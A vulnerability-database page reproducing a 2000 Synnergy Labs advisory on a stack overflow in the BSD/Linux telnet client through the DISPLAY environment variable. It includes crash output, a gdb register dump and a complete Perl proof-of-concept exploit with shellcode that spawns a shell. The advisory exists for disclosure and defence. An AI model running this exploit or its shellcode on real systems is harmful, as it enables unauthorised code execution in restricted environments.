Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

tco.txt

🗓️ 22 Sep 2000 00:00:00Reported by synnergyType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Bug found in BSD/Linux telnet client leads to stack overflow risk via DISPLAY variable overflow.

Code
`  
Synnergy Laboratories Advisory SLA-2000-14  
  
NAME  
  
BSD/Linux telnet client overflow   
  
AFFECTED  
  
Linux  
Debian  
Redhat  
Mandrake  
Slackware  
[ possibly others ]  
  
BSD  
FreeBSD  
[ possible others ]  
  
  
SYNOPSIS  
  
Synnergy Labs has found a bug in the telnet client that causes a stack   
overflow by filling the DISPLAY environment variable with approx 1000-3000   
bytes, allowing possible code execution to take place.  
  
  
DESCRIPTION  
  
Synnergy has recently discovered a trivial bug in the BSD/Linux telnet client,  
that overwrites the EIP register on the stack. From a security point of view  
this bug would not cause much of a problem in general since the telnet client  
does not run with elevated priviledges. Though, there are *possible* scenarios  
where this bug may present itself. Such a case was provided by the FreeBSD  
security admin, who said:  
  
"a non-shell service providing environment, where users are not intended to  
be able to execute arbitrary code, but can set environmental variables  
(i.e., a telnet-in old-style BBS with a telnet-out function). My suspicion is   
that if you have an environment like this, many base system tools suffer from   
this limitation "  
  
Other possible scenarious would be, a restricted shell in a role playing game,  
or message board system within the shell. Both these situations allow the user   
to manually edit the environment variables, thus giving reason behind this advisory.  
Since the DISPLAY environment variable is passed through telnetd you could exploit   
an account without a password that runs telnet.  
  
The bug occurs by setting the DISPLAY environment variable to around 1000 bytes,  
though this may vary from distribution to distribution. Redhat segfaulted around  
2000.  
  
Example:   
  
[ dethy@syn ] $ export DISPLAY=`perl -e 'print "A"x1000'`  
[ dethy@syn ] $ telnet localhost  
  
Trying 127.0.0.1...  
Connected to localhost.  
Escape character is '^]'.  
Segmentation fault (core dumped)  
  
Now loading up gdb, we see the following:  
#0 0x41414141 in ?? ()  
(gdb) info all-registers  
eax 0xbfbfd672 -1077946766  
ecx 0x3e 62  
edx 0x80574d0 134575312   
ebx 0xf0 240  
esp 0xbfbfd6e8 0xbfbfd6e8  
ebp 0x41414141 0x41414141  
esi 0xc 12  
edi 0xf 15  
eip 0x41414141 0x41414141  
eflags 0x10246 66118  
  
..a successful hit! EIP and EBP were overwritten, thus arbitary code could  
be spawned, but a shell is good enough for us. :)  
  
Below is a proof of concept exploit that demonstrates the overflow by spawning  
a shell through telnet, once the environment variable has been set.  
  
#!/usr/bin/perl  
# Generic exploit program in perl, which clears the environment to take  
# away the need for offset guessing.  
# Dvorak (@synnergy.net // @hit2000.org) 1999.  
  
$egg = "\x90" x 1500;  
$egg .= "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76";  
$egg .= "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b";  
$egg .= "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff";  
$egg .= "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff";  
$egg .= "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02";  
$egg .= "\x02\x02\x02/bin/sh.-c.sh";  
  
foreach $key (keys %ENV) {  
delete $ENV{$key};  
}  
  
# change the size of $buf if you need to.  
  
$buf="";  
for ($i = 0; $i < 256; $i++) {  
$buf .= "\x01\xda\xbf\xbf";  
}  
  
# Put here your use for $buf, the string to exploit the vulnerable program with  
  
$ENV{"DISPLAY"} = $buf;  
$ENV{"egg"} = $egg;  
system("/usr/bin/telnet localhost");  
  
printf("Exploit done\n");  
  
  
SOLUTION  
  
I have contacted the FreeBSD security admin, and he is working on his own advisory,  
I would like to thank Rob Watson for his promptness.  
Other distributions should come out with their advisories soon.  
  
  
AUTHOR  
  
Advisory : dethy @ synnergy.net  
Discovery: hf @ synnergy.net  
Exploit : dvorak @ synnergy.net  
  
  
DISCLAIMER  
  
Synnergy Laboratories may not be held liable for the use or potential  
effects of these programs or advisories, nor the content contained  
within. Use them at your own risk.  
  
COPYRIGHT  
  
Synnergy Laboratories - www.synnergy.net (c) 1998-2000   
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Sep 2000 00:00Current
7.4High risk
Vulners AI Score7.4
telnet client bugstack overflowbsd linuxenvironment variable exploitcode execution risklow privilege issue.
19